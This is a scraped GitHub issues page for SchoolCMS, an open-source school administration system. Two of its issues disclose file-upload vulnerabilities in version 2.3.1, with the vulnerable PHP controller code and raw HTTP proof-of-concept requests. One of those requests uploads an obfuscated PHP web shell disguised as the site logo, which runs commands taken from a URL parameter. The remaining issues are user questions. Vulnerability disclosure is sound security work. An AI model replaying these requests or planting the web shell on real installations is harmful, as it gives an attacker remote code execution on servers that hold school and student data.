gongfuxiang / schoolcms Goto Github PK

View Code? Open in Web Editor NEW

251.0 12.0 109.0 14.35 MB

**首个开源学校教务管理系统、网站布局自动化、学生/成绩/教师、成绩查询

License: Apache License 2.0

PHP 41.07% HTML 9.49% PLpgSQL 3.03% JavaScript 32.50% CSS 13.74% Smarty 0.18%

school

schoolcms's Issues

SchoolCMS v2.3.1 file upload and unzip vulnerability

Detail:

POST /schoolcms/admin.php?m=admin&c=theme&a=upload HTTP/1.1
Host: 127.0.0.1
Content-Length: 502
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://127.0.0.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzvqqC1ZAHhAnw74R
Referer: http://127.0.0.1/schoolcms/admin.php?m=admin&c=theme&a=index&view_type=upload
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=tiamjbmuiknb087jko5umifkq0; think_language=zh-CN
Connection: close

------WebKitFormBoundaryzvqqC1ZAHhAnw74R
Content-Disposition: form-data; name="max_file_size"

51200000
------WebKitFormBoundaryzvqqC1ZAHhAnw74R
Content-Disposition: form-data; name="theme"; filename="test_Static.zip"
Content-Type: application/x-zip-compressed

���

c=theme -> Controller=theme, a=upload -> action=upload. /schoolcms/Application/Admin/Controller/ThemeController.class.php Line 180:

	public function Upload()
	{
		// 是否ajax
		if(!IS_AJAX)
		{
			$this->error(L('common_unauthorized_access'));
		}

		// 文件上传校验
		$error = FileUploadError('theme');
		if($error !== true)
		{
			$this->ajaxReturn($error, -1);
		}

		// 文件格式化校验
		$type = array('application/zip', 'application/octet-stream');
		if(!in_array($_FILES['theme']['type'], $type))
		{
			$this->ajaxReturn(L('theme_upload_error'), -2);
		}

		// 开始解压文件
		$resource = zip_open($_FILES['theme']['tmp_name']);
		while(($temp_resource = zip_read($resource)) !== false)
		{
			if(zip_entry_open($resource, $temp_resource))
			{
				// 当前压缩包中项目名称
				$file = zip_entry_name($temp_resource);

				// 排除临时文件和临时目录
				if(strpos($file, '/.') === false && strpos($file, '__') === false)
				{
					// 拼接路径
					if(strpos($file, '_Html') !== false)
					{
						$file = $this->html_path.$file;
					} else if(strpos($file, '_Static') !== false)
					{
						$file = $this->static_path.$file;
					} else {
						continue;
					}
					$file = str_replace(array('_Static/', '_Html/'), '', $file);

					// 截取文件路径
					$file_path = substr($file, 0, strrpos($file, '/'));

					// 路径不存在则创建
					if(!is_dir($file_path))
					{
						mkdir($file_path, 0777, true);
					}

					// 如果不是目录则写入文件
					if(!is_dir($file))
					{
						// 读取这个文件
						$file_size = zip_entry_filesize($temp_resource);
						$file_content = zip_entry_read($temp_resource, $file_size);
						file_put_contents($file, $file_content);
					}
					// 关闭目录项  
					zip_entry_close($temp_resource);
				}
				
			}
		}
		$this->ajaxReturn(L('common_operation_success'));
	}
}

check Content-Type, default is "application/x-zip-compressed", not in array

		// 文件格式化校验
		$type = array('application/zip', 'application/octet-stream');
		if(!in_array($_FILES['theme']['type'], $type))
		{
			$this->ajaxReturn(L('theme_upload_error'), -2);
		}

unzip, check filename, if filename does not contain "_Html" or "_Static" , it will Jump to the next loop.

		while(($temp_resource = zip_read($resource)) !== false)
		{
			if(zip_entry_open($resource, $temp_resource))
			{
				// 当前压缩包中项目名称
				$file = zip_entry_name($temp_resource);

				// 排除临时文件和临时目录
				if(strpos($file, '/.') === false && strpos($file, '__') === false)
				{
					// 拼接路径
					if(strpos($file, '_Html') !== false)
					{
						$file = $this->html_path.$file;
					} else if(strpos($file, '_Static') !== false)
					{
						$file = $this->static_path.$file;
					} else {
						continue;
					}

html_path,static_path: Line 14

	private $html_path;
	private $static_path;

	/**
	 * [_initialize 前置操作-继承公共前置方法]
	 * @author   Devil
	 * @blog     http://gong.gg/
	 * @version  0.0.1
	 * @datetime 2016-12-03T12:39:08+0800
	 */
	public function _initialize()
	{
		// 调用父类前置方法
		parent::_initialize();

		// 登录校验
		$this->Is_Login();

		// 权限校验
		$this->Is_Power();

		// 静态目录和html目录
		$this->html_path = 'Application'.DS.'Home'.DS.'View'.DS;
		$this->static_path = 'Public'.DS.'Home'.DS;
	}

DS: /schoolcms/core.php Line 47

/* 定义系统目录分隔符 */
define('DS', DIRECTORY_SEPARATOR);

static_path = '\Public\Home\'

write to file

$file_size = zip_entry_filesize($temp_resource);
$file_content = zip_entry_read($temp_resource, $file_size);
file_put_contents($file, $file_content);

POC:

set Content-Type=application/zip and filename=test_Static.php

POST /schoolcms/admin.php?m=admin&c=theme&a=upload HTTP/1.1
Host: 127.0.0.1
Content-Length: 489
Accept: application/json, text/javascript, */*; q=0.01
Origin: http://127.0.0.1
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.86 Safari/537.36
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryzvqqC1ZAHhAnw74R
Referer: http://127.0.0.1/schoolcms/admin.php?m=admin&c=theme&a=index&view_type=upload
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=tiamjbmuiknb087jko5umifkq0; think_language=zh-CN
Connection: close

------WebKitFormBoundaryzvqqC1ZAHhAnw74R
Content-Disposition: form-data; name="max_file_size"

51200000
------WebKitFormBoundaryzvqqC1ZAHhAnw74R
Content-Disposition: form-data; name="theme"; filename="test_Static.zip"
Content-Type: application/zip

���

upload success:

There is two xss vulnerability

如何关闭安全设置

演示地址怎么404了

SchoolCMS v2.3.1has a file upload vulnerability

Detail:

Http:

POST /admin.php?m=Admin&c=Site&a=Save HTTP/1.1
Host: schoolcms.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: application/json, text/javascript, */*; q=0.01
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Content-Type: multipart/form-data; boundary=---------------------------20557339626727
Content-Length: 2437
Origin: http://schoolcms.com
Connection: close
Referer: http://schoolcms.com/admin.php?m=Admin&c=Site&a=Index
Cookie: PHPSESSID=7hb5r5vqt11i3m5l3hojh68rf2; think_language=zh-CN

-----------------------------20557339626727
Content-Disposition: form-data; name="max_file_size"

2047997
-----------------------------20557339626727
Content-Disposition: form-data; name="home_site_name"

SchoolCMS
-----------------------------20557339626727
Content-Disposition: form-data; name="home_site_logo_img"; filename="test.php"
Content-Type: text/php

<?php
$shang='tpY<$*'^"\x15\x3\x2a\x59\x56\x5e";

@$shang($_GET['a']);
?>
-----------------------------20557339626727
Content-Disposition: form-data; name="home_site_logo"

/Public/Upload/Home/image/home_logo.php
-----------------------------20557339626727
Content-Disposition: form-data; name=""


-----------------------------20557339626727
Content-Disposition: form-data; name="home_max_limit_image"

2047997
-----------------------------20557339626727
Content-Disposition: form-data; name="home_max_limit_file"

51200000
-----------------------------20557339626727
Content-Disposition: form-data; name="home_max_limit_video"

102400000
-----------------------------20557339626727
Content-Disposition: form-data; name="home_content_max_width"

1200
-----------------------------20557339626727
Content-Disposition: form-data; name="home_site_close_reason"

å��çº§ä¸...
-----------------------------20557339626727
Content-Disposition: form-data; name=""


-----------------------------20557339626727
Content-Disposition: form-data; name="common_verify_expire_time"

600
-----------------------------20557339626727
Content-Disposition: form-data; name="common_verify_time_interval"

30
-----------------------------20557339626727
Content-Disposition: form-data; name="home_site_icp"

1111
-----------------------------20557339626727
Content-Disposition: form-data; name="home_footer_info"

111
-----------------------------20557339626727
Content-Disposition: form-data; name="common_timezone"

Asia/Shanghai
-----------------------------20557339626727
Content-Disposition: form-data; name="home_site_state"

1
-----------------------------20557339626727
Content-Disposition: form-data; name="home_user_login_state"

1
-----------------------------20557339626727
Content-Disposition: form-data; name="home_img_verify_state"

1
-----------------------------20557339626727
Content-Disposition: form-data; name="home_user_reg_state"

sms,email
-----------------------------20557339626727--

code: WWW\schoolcms\Application\Admin\Controller\SiteController.class.php


	public function Save()
	{
		// 站点logo
		if(isset($_FILES['home_site_logo_img']['error']))
		{
			// 文件上传校验
			$error = FileUploadError('home_site_logo_img');
			if($error !== true)
			{
				$this->ajaxReturn($error, -1);
			}

			// 文件类型
			list($type, $suffix) = explode('/', $_FILES['home_site_logo_img']['type']);
			$path = 'Public/Upload/Home/image/';
			if(!is_dir($path))
			{
				mkdir(ROOT_PATH.$path, 0777, true);
			}
			$filename = 'home_logo.'.$suffix;
			$home_site_logo = $path.$filename;
			if(move_uploaded_file($_FILES['home_site_logo_img']['tmp_name'], ROOT_PATH.$home_site_logo))
			{
				$_POST['home_site_logo'] = '/'.$home_site_logo;
			}
		}

		// 站点状态值处理
		if(!isset($_POST['home_user_reg_state']))
		{
			$_POST['home_user_reg_state'] = '';
		}

		// 基础配置
		$this->MyConfigSave();
	}
}
?>

php7问题

你好，请问在php7下总是安装提示连接数据库失败，这是什么情况呢

Recommend Projects

React

A declarative, efficient, and flexible JavaScript library for building user interfaces.
Vue.js

🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript

TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
TensorFlow

An Open Source Machine Learning Framework for Everyone
Django

The Web framework for perfectionists with deadlines.
Laravel

A PHP framework for web artisans
D3

Bring data to life with SVG, Canvas and HTML. 📊📈🎉

Recommend Topics

javascript

JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
web

Some thing interesting about web. New door for the world.
server

A server is a program made to process requests and deliver data to clients.
Machine learning

Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Visualization

Some thing interesting about visualization, use data art
Game

Some thing interesting about game, make everyone happy.

Recommend Org

Facebook

We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft

Open source projects and samples from Microsoft.
Google

Google ❤️ Open Source for everyone.
Alibaba

Alibaba Open Source for everyone
D3

Data-Driven Documents codes.
Tencent

China tencent open source team.